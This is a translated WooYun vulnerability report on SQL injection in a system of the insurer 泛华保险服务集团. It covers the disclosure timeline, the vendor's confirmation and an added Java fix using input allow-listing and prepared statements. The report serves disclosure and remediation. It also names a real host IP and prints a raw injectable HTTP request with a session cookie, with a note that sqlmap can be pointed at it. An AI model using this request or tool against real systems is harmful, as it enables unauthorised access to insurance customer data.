
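Vulnerability Summary

Bug ID: wooyun-2015-0142197

Title: SQL injection in a system of 泛华保险服务集团; a single database contains more than 1,000 tables

Vendor: 泛华保险服务集团

Author: 路人甲

Submitted: 2015-09-23 09:09

Fixed: 2015-11-10 18:36

Published: 2015-11-10 18:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]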


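Vulnerability Details

Disclosure status:

2015-09-23: Details reported to the vendor; awaiting vendor handling
2015-09-26: Vendor confirmed; details disclosed only to the vendor
2015-10-06: Details disclosed to core white hats and experts in related fields
2015-10-16: Details disclosed to regular white hats
2015-10-26: Details disclosed to intern white hats
2015-11-10: Details disclosed to the public

Brief description:

A single database contains more than 1,000 tables.

Detailed description:

The injection point is as follows: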

GET /aeongroup/InsuranceCeSuan.jsp?RiskCode=204901057 HTTP/1.1
Host: 219.141.188.51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://219.141.188.51/aeongroup/ProductGList.jsp?EdorFlag=A3
Cookie: JSESSIONID=00009wK3LZiAozxiRGH2NhD9GSd:18lmrf6id; Role.LastRoleCode=0001
Connection: keep-alive


Running sqlmap directly with -r on this request performs the injection.
More than 1,000 tables.

Proof of vulnerability:


Fix:

Filter the input.

Copyright notice: when reprinting, please credit the source 路人甲@乌云
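
The fix above says only to filter the input. As an added example (not part of the original report and not the vendor's code), one way to do that for the numeric RiskCode parameter is an allow-list check followed by a JDBC PreparedStatement. The class name, the table and column names (risk_product, risk_code, risk_name) and the 12-digit length limit are assumptions of this example.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

// Added example: hypothetical handler for the RiskCode request parameter.
public class RiskCodeLookup {
    // Allow-list: the report shows RiskCode as a 9-digit number (204901057);
    // accepting up to 12 digits is an assumption of this example.
    private static final Pattern RISK_CODE = Pattern.compile("[0-9]{1,12}");

    /** Returns the validated code, or throws if it is not purely numeric. */
    static String validateRiskCode(String raw) {
        if (raw == null || !RISK_CODE.matcher(raw).matches()) {
            throw new IllegalArgumentException("invalid RiskCode");
        }
        return raw;
    }

    /** Looks up a product name; table and column names are hypothetical. */
    static String findRiskName(Connection conn, String rawRiskCode) throws SQLException {
        String riskCode = validateRiskCode(rawRiskCode);
        // The value is bound as a parameter, never concatenated into the SQL text.
        String sql = "SELECT risk_name FROM risk_product WHERE risk_code = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, riskCode);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed sample inputs: one well-formed code and malformed variants.
        String[] samples = {"204901057", "204901057'", "204901057 OR 1=1", "", null};
        for (String s : samples) {
            try {
                System.out.println("accepted: " + validateRiskCode(s));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + s);
            }
        }
    }
}
```

In the JSP, a rejected value should produce an HTTP 400 response rather than reach the database layer.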


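Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-26 18:35

Vendor reply:

The development platform has been notified. Thank you very much!

Latest status:

None yet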